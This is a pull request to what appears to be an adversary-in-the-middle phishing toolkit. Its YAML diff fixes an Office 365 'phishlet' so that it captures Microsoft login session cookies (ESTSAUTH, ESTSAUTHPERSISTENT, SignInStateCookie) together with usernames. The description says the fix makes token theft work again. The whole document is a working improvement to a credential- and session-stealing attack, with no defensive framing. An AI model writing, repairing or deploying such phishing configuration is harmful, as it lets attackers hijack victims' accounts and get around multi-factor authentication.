### PR TITLE
O365 phishlet was not capturing authentication tokens. 

### DIFF
--- a/phishlets/o365.yaml
+++ b/phishlets/o365.yaml
@@ -20,9 +20,7 @@ sub_filters:
   #- {triggers_on: '<insert-adfs-subdomain-and-host>', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
 auth_tokens:
   - domain: '.login.microsoftonline.com'
-    keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT']
-  - domain: 'login.microsoftonline.com'
-    keys: ['SignInStateCookie']
+    keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', 'SignInStateCookie']
 credentials:
   username:
     key: '(login|UserName)'


### PR DESCRIPTION
O365 phishlet wasn't capturing authentication tokens. By making a quick change in the auth_tokens section, it captures authentication tokens now.